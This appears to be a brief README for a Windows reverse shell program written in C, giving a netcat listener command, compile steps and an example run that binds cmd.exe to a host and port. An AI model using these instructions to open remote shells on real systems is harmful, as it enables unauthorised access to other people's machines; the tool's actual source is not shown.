#### just a simple reverse shell, use `nc -lvp port` as the server, and u will get the shell ;) ... to compile, open vs command prompt, and use `cl ReverseShell.c`, then run the exe, (for ex: ReverseShell.exe cmd.exe 127.0.0.1 8080)
